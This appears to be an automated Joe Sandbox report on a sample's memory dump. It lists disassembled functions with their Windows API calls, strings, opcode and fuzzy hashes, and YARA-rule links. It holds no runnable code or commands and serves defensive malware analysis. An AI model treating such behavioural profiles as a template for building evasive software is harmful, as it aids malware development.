Opcode Fuzzy Hash: 168dfac6e901eb54d297dee3559e6f2b50157cdc8d4f7727f677ca4ac235dbec
Instruction Fuzzy Hash: B011E7B1500A15AFCB712F74AC09FFE3B9ADF003A1B14452EF9069B650DE34D9C18798

Function 00706369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,006F7896,?,?,00000000), ref: 00695A2C
Part of subcall function 00695A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,006F7896,?,?,00000000,?,?), ref: 00695A50

gethostbyname.WSOCK32(?,?,?), ref: 00706399
WSAGetLastError.WSOCK32(00000000), ref: 007063A4
_memmove.LIBCMT ref: 007063D1
inet_ntoa.WSOCK32(?), ref: 007063DC

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: 5ed0d3f11390d4fd7bf0667e344073367acca3378e622c27863c2aead0b37ba6
Instruction ID: ed077d8cc425e49fa2bb7bb5b8dce1a1f83b76c51e5e32723121f77737cf5d64
Opcode Fuzzy Hash: 5ed0d3f11390d4fd7bf0667e344073367acca3378e622c27863c2aead0b37ba6
Instruction Fuzzy Hash: 5B118E31900109EFCF04FBA8DD46CEEB7BDAF04320B008129F506A71A1DB34AE14CB65

Function 006E8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 006E8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 006E8BA4

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
Instruction ID: ce188be3c85f8b632a6ddb4fb10728dc7a9d053fd71762fb1881f27e4e434b93
Opcode Fuzzy Hash: c65a6f208035f703a754aff219547e6faa073b1c8ad3d5fb3a48433355829e9e
Instruction Fuzzy Hash: 6B111C79901218FFDB11DF95CC85F9DBB75FB48710F204095E904B7290DA716E11DB94

Function 00691290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00692612: GetWindowLongW.USER32(?,000000EB), ref: 00692623

DefDlgProcW.USER32(?,00000020,?), ref: 006912D8
GetClientRect.USER32(?,?), ref: 006CB5FB
GetCursorPos.USER32(?), ref: 006CB605
ScreenToClient.USER32(?,?), ref: 006CB610

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 612fdde8d8c161f24cfbf7da72f690f08e28c9055252fe5b5fc4795baff7c9d9
Instruction ID: 423182b24db2fdea47b3e18cc797887a5a43d4ae6b96546ae34ed47d7d7da243
Opcode Fuzzy Hash: 612fdde8d8c161f24cfbf7da72f690f08e28c9055252fe5b5fc4795baff7c9d9
Instruction Fuzzy Hash: 04112B3550001AEBCF00EFA8D8859FE77BAEB06301F504465F901EB641D734BA918BA9

Function 006ED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 006ED84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 006ED864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 006ED879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 006ED897

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: fb40364bd3d7206c398476d23f2070723d2b9902f6cdab844740ecd9c9665e09
Instruction ID: 3e3058a0fb09f5c81a68fc4bece4fe74263fe5edfa2a38abb0207352f31a3c70
Opcode Fuzzy Hash: fb40364bd3d7206c398476d23f2070723d2b9902f6cdab844740ecd9c9665e09
Instruction Fuzzy Hash: 221161B5606354EBE320CF56DC08F93BBBDEB00B00F108569E916D6190D7B5E5499BA1

Function 006C6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 006C6FDB

Part of subcall function 006C76C2: __fltout2.LIBCMT ref: 006C76EB

__cftog_l.LIBCMT ref: 006C7001
__cftoe_l.LIBCMT ref: 006C7033

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 4870b902e72ed76d9f2998e36c2c63348b6b9e98c57754224fb282e6885fbb04
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 5C017BB214814ABBCF125E85CC05DEE3F63FB18390B488419FA1859131C636C9B1AF81

Function 0071B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 0071B2E4
ScreenToClient.USER32(?,?), ref: 0071B2FC
ScreenToClient.USER32(?,?), ref: 0071B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 0071B33B

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
Instruction ID: 8fe13473690d8c291b35f365e11271bc1e68086c8e995317c925a70d0678d1b8
Opcode Fuzzy Hash: 2bec43f42d4f33bc7f50b7448ba930a34a463701839a2bd1e7b4d2f0ceba649b
Instruction Fuzzy Hash: 5A1144B9D00209EFDB41CFA9C8849EEBBF9FF08310F108166E914E3260D735AA658F54

Function 006F6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 006F6BE6

Part of subcall function 006F76C4: _memset.LIBCMT ref: 006F76F9

_memmove.LIBCMT ref: 006F6C09
_memset.LIBCMT ref: 006F6C16
LeaveCriticalSection.KERNEL32(?), ref: 006F6C26

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: c8904b0cd9d811693be894f02fd8090b04aec19899d1059f2a3619ff1793dd3d
Instruction ID: c4f933b25b605df6d97ad38b0894d3eb9688e189ebdbc82d0004b958f7c12335
Opcode Fuzzy Hash: c8904b0cd9d811693be894f02fd8090b04aec19899d1059f2a3619ff1793dd3d
Instruction Fuzzy Hash: 54F03A7A200104ABCF416F55DC85A8ABB2AEF45321B04C0A5FE089E266C735E851CBB8

Function 00692218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00692231
SetTextColor.GDI32(?,000000FF), ref: 0069223B
SetBkMode.GDI32(?,00000001), ref: 00692250
GetStockObject.GDI32(00000005), ref: 00692258
GetWindowDC.USER32(?,00000000), ref: 006CBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 006CBE90
GetPixel.GDI32(00000000,?,00000000), ref: 006CBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 006CBEC2
GetPixel.GDI32(00000000,?,?), ref: 006CBEE2
ReleaseDC.USER32(?,00000000), ref: 006CBEED

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: f28c55eabf4c516a3132085dfe21a076a580ab7bfda4e7674d84eb53be25ccc6
Instruction ID: b2521d9683128116387c45d30b384dc401663771b5120047e1ab7b61060612ae
Opcode Fuzzy Hash: f28c55eabf4c516a3132085dfe21a076a580ab7bfda4e7674d84eb53be25ccc6
Instruction Fuzzy Hash: 93E03932144248FADF215FA8FC0DBE83B12EB05332F10C36AFA69880E1C7754990EB12

Function 006E8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 006E871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,006E82E6), ref: 006E8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,006E82E6), ref: 006E872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,006E82E6), ref: 006E8736

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
Instruction ID: 916b4921ba3a832865cb40d184cd275d40301619cb00518f2711c08a5d401669
Opcode Fuzzy Hash: d2c4388b59a69907c1452b4e728b265e41477846f5122732679a0380a500ebb9
Instruction Fuzzy Hash: DAE04F366123119FDB205FB55D0CBDA3BA8EF54791F15C828E649CA090DA3884428754

Function 00696240 Relevance: 5.6, APIs: 2, Strings: 1, Instructions: 317COMMON

Download Yara Rule

Strings

%r, xrefs: 0069624E

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID:
String ID: %r
API String ID: 0-2999538795
Opcode ID: 0ae4fa7075a1ab6df4b07a88fe28f0698fd7c6b7f6821dbd248f4ef20b13b43c
Instruction ID: b13af2218a1cd67bd75b3332d5a1c918cefd86f36d4916b971011878357077aa
Opcode Fuzzy Hash: 0ae4fa7075a1ab6df4b07a88fe28f0698fd7c6b7f6821dbd248f4ef20b13b43c
Instruction Fuzzy Hash: 14B180719002099ACF15EF94C485AFEB7BFFF44710F10802AF516ABA91DB349E86CB95

Function 0070AEA2 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 313COMMON

Download Yara Rule

APIs

__itow_s.LIBCMT ref: 0070AFAE

Strings

xbu, xrefs: 0070AFE4
xbu, xrefs: 0070B010

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: __itow_s
String ID: xbu$xbu
API String ID: 3653519197-888344011
Opcode ID: 475afe96c8b50650e2f23c7497e9fbcca6e233effeedf7ad1119c143bff2651f
Instruction ID: b886a031ac0db30d64aec558ee6022d60f03f72dd9315f3dc810e9117e9abe65
Opcode Fuzzy Hash: 475afe96c8b50650e2f23c7497e9fbcca6e233effeedf7ad1119c143bff2651f
Instruction Fuzzy Hash: E0B16D70A0020AEBCF14DF54C891EAABBFAFF58310F148159F9459B291EB74EA41CB64

Function 006FAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 006AFC86: _wcscpy.LIBCMT ref: 006AFCA9

Part of subcall function 00699837: __itow.LIBCMT ref: 00699862
Part of subcall function 00699837: __swprintf.LIBCMT ref: 006998AC

__wcsnicmp.LIBCMT ref: 006FB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 006FB0F6

Strings

LPT, xrefs: 006FB027

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: dfeff488a4f22fe2590ae7aca444b3f207f8b913b35d36653bf2e6617f968edb
Instruction ID: 477523e172bf8f3a3ae930306525871e239b967d42d25cb82288c3ee8ce827fb
Opcode Fuzzy Hash: dfeff488a4f22fe2590ae7aca444b3f207f8b913b35d36653bf2e6617f968edb
Instruction Fuzzy Hash: 5C617075A00219AFCB14DF98C891EFEB7BAEB09310F10416DF916AB351DB70AE81CB55

Function 006A2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 006A2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 006A2981

Strings

@, xrefs: 006A2975

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 503f429636b11a3f5e153709cf8308a0a2e3b7f3499e4b129f014e4f8dc453dd
Instruction ID: 2d009bf9c9b4716e12eb81314afea6900efc3cabe21818d32a006e41f6737a8b
Opcode Fuzzy Hash: 503f429636b11a3f5e153709cf8308a0a2e3b7f3499e4b129f014e4f8dc453dd
Instruction Fuzzy Hash: EC5159714187449FDB60EF14D885BAFB7ECFB85340F41885DF2D8810A1EB309929CB6A

Function 006F9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00694F0B: __fread_nolock.LIBCMT ref: 00694F29

_wcscmp.LIBCMT ref: 006F9824
_wcscmp.LIBCMT ref: 006F9837

Strings

FILE, xrefs: 006F9770

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 5cc39ef7cd7bfc8e83f1fb5a029ff4900b6044e62a84c0b09bf6370aecb2d58d
Instruction ID: 617cf7e2c166d74e3b039cf2f793b7385cafcbf3dee706506f6de02b91817b07
Opcode Fuzzy Hash: 5cc39ef7cd7bfc8e83f1fb5a029ff4900b6044e62a84c0b09bf6370aecb2d58d
Instruction Fuzzy Hash: 8841A871A0021EBADF659AA4CC85FEFB7BEDF85710F00047DFA04A7181DA7199058B65

Function 006D0574 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 006D057F

Strings

Ddu, xrefs: 0069A317
Ddu, xrefs: 0069A151

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: ClearVariant
String ID: Ddu$Ddu
API String ID: 1473721057-4131560066
Opcode ID: a8b69dc1a4df87c0c95df840e22aa14f1c322d775f67f1c34a7d81d7f17e6cbc
Instruction ID: a5d35257765c3cc5dba0c99e4e10b48304891da7a050d14aa929603e0177d916
Opcode Fuzzy Hash: a8b69dc1a4df87c0c95df840e22aa14f1c322d775f67f1c34a7d81d7f17e6cbc
Instruction Fuzzy Hash: 46512478A083418FDB54CF58C580AAABBF6FB99754F54881DE8858B720D331EC81CF82

Function 0070258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0070259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 007025D4

Strings

|, xrefs: 007025A5

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 5bfbea10db7db9b1baa5139352b6a1c4e4d7aa821fe671c4a48e0d87d95ab4ab
Instruction ID: 14de2470f1696b23aa25a0ed3e35938356f521a0b22a60d90d184ec243da6d66
Opcode Fuzzy Hash: 5bfbea10db7db9b1baa5139352b6a1c4e4d7aa821fe671c4a48e0d87d95ab4ab
Instruction Fuzzy Hash: FD313A71810119EBCF41EFA0CC89EEEBFBAFF08310F100159F915AA162EB355956DB64

Function 00717A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00717B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00717B76

Strings

', xrefs: 00717ACA

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: 47216c6340d8089ec0e1a8096a7324db5037d275264bc1ff485660b056e2f0dd
Instruction ID: dead9369ce0f697828f51896eea14335e6a0274139cfb4aabd156c058dbd051d
Opcode Fuzzy Hash: 47216c6340d8089ec0e1a8096a7324db5037d275264bc1ff485660b056e2f0dd
Instruction Fuzzy Hash: 3A410874A0930A9FDB14CF68C891BDABBB5FF08300F10416AE905AB391D774AA91CF90

Function 00716A63 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 95COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?,?), ref: 00716B17
MoveWindow.USER32(?,?,?,?,?,00000001,?,?,?), ref: 00716B53

Strings

static, xrefs: 00716AB3

Memory Dump Source

Source File: 00000000.00000002.2087237739.0000000000691000.00000020.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.2087216986.0000000000690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.000000000071F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087300785.0000000000744000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087365346.000000000074E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2087401416.0000000000757000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_tfWjjV1LdT.jbxd

Similarity

API ID: Window$DestroyMove
String ID: static
API String ID: 2139405536-2160076837
Opcode ID: be2a3b6db2784da958383e9a982a2ceeb1e808baca87e8803b1aa87fcddab1f0
Instruction ID: 4057577c72777f2a43528d0180b47e3501c984df1494b4d37176c7151359af3d
Opcode Fuzzy Hash: be2a3b6db2784da958383e9a982a2ceeb1e808baca87e8803b1aa87fcddab1f0
Instruction Fuzzy Hash: 7A316BB1200604AEDB109F68DC81AFB77A9FF48760F10C61DF9A9D7190DA39AC91CB64

Function 006F28A2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 006F2911
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 006F294C

Strings

